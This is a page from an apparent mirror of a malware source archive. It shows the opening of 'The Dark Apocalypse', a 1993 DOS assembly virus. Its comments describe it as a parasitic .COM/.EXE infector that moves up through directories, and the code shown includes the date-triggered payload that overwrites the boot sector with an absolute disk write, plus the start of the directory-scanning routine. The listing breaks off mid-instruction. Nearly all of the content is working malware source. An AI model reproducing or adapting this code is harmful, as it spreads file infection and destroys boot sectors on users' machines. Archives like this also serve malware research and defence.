mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
4b9382ddbc
push
561 lines
17 KiB
NASM
561 lines
17 KiB
NASM
;****************************************************************************
|
||
;* The Dark Apocalypse *
|
||
;* (C)1993 by Crypt Keeper ùùRoTùù *
|
||
;****************************************************************************
|
||
|
||
;Parasitic Non-Resident .COM and .EXE infector
|
||
;Activation : Monday 16th (Fri 13, Sat 14, Sun 15, ...)
|
||
|
||
;This virus is a parasitic infector of .COM and .EXE files and is traversal
|
||
;(infects more than the directory it is in) using the "CD .." method. It
|
||
;infects files by appending to the end. It triggers on any Monday 16th,
|
||
;replacing the boot sector with code to reboot the machine.
|
||
;COMMAND.COM is never infected.
|
||
|
||
CODE SEGMENT
|
||
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
|
||
|
||
VTOP EQU $ ;Top of virus code
|
||
|
||
;Equates --------------------------------------------------------------------
|
||
|
||
VLENGTH EQU VBOT-VTOP ;Length of virus in bytes
|
||
MAXINF EQU 3 ;Max files to infect in each directory
|
||
VLPARA EQU (VLENGTH/16)+1 ;Virus length in paragraphs
|
||
IDWORD EQU 0FFEEh ;ID word (for EXE files)
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
LEA AX,[BP+(OFFSET(STACK1)+64)] ;Get stack pointer
|
||
MOV SP,AX
|
||
|
||
CALL GETDELTA
|
||
GETDELTA:
|
||
POP BP
|
||
SUB BP,OFFSET(GETDELTA) ;Find delta offset
|
||
|
||
PUSH DS
|
||
PUSH ES ;Save original segment regs (EXE)
|
||
|
||
PUSH CS
|
||
POP DS
|
||
PUSH CS
|
||
POP ES ;Set up new segments
|
||
|
||
CLD ;Clear direction flag
|
||
|
||
LEA SI,[BP+OFFSET(ORIGBYT)]
|
||
LEA DI,[BP+OFFSET(OLD_OB)]
|
||
MOV CX,BCLEN
|
||
REP MOVSB ;Shadow saved bytes into buffer
|
||
|
||
LEA SI,[BP+OFFSET(ORIG_IP)]
|
||
LEA DI,[BP+OFFSET(ORIGIP)]
|
||
MOV CX,4
|
||
REP MOVSW ;Shadow EXE header information
|
||
|
||
MOV AH,2Ah ;Get date
|
||
INT 21h
|
||
|
||
CMP AL,1 ;Monday?
|
||
JNE NOTRIGGER ;If not, don't trigger
|
||
|
||
CMP DL,16 ;The 16th?
|
||
JNE NOTRIGGER ;If not, don't trigger
|
||
|
||
MOV AH,19h ;Get default drive
|
||
INT 21h
|
||
|
||
LEA BX,[BP+OFFSET(REBOOTCOD)] ;Offset of reboot code
|
||
MOV CX,1 ;Number of sectors to write
|
||
XOR DX,DX ;Start at absolute sector 0
|
||
|
||
INT 26h ;Absolute disk write
|
||
JC WRITE_ERROR ;Skip POPF if error
|
||
|
||
POPF ;Pop flags (after INT 26h return)
|
||
WRITE_ERROR:
|
||
LEA DX,[BP+OFFSET(MESSAGE)] ;Display message
|
||
MOV AH,9 ;Print string
|
||
INT 21h
|
||
|
||
INT 05h ;Print screen
|
||
|
||
XOR AH,AH ;Read keyboard
|
||
INT 16h ;BIOS keyboard interrupt
|
||
|
||
JMP REBOOTCOD ;Reboot the machine
|
||
NOTRIGGER:
|
||
LEA SI,[BP+OFFSET(ORIGDIR)] ;Save original directory name
|
||
XOR DL,DL ;from current drive
|
||
|
||
MOV AH,47h ;Get current directory
|
||
INT 21h
|
||
DIRSCAN:
|
||
LEA SI,[BP+OFFSET(OLDDIR)] ;Save old directory name
|
||
XOR DL,DL ;from current drive
|
||
|
||
MOV AH,47h ;Get current directory
|
||
INT 21h
|
||
|
||
MOV AX,WORD PTR [BP+OFFSET(OLDDIR)] ;Get first 2 bytes of old DIR
|
||
CMP AX,'\ |